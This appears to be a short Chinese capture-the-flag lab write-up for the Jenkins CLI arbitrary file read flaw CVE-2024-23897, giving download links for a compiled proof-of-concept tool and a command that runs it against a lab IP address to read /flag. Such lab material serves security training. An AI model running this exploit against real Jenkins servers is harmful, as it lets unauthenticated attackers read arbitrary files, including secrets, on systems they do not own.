一、靶场介绍
Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中’@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。

二、POC下载
.直接下载编译好的二进制文件
Linux:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_linux_amd64.zip
Window:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip
其他系统Release:
https://github.com/wjlin0/CVE-2024-23897/releases/tag/v1.0.1
获取flag
CVE-2024-23897.exe -u http://39.106.48.123:41922/ -a /flag





![[笔记]一组电缆、定位相关产品的技术参数](https://i-blog.csdnimg.cn/direct/0c2cd2f8f816401bba57e52cf2f14fc1.png)














![[spring]用MyBatis XML操作数据库 其他查询操作 数据库连接池 mysql企业开发规范](https://i-blog.csdnimg.cn/direct/c882b5582afb4c208f8ded6026bf76f2.png)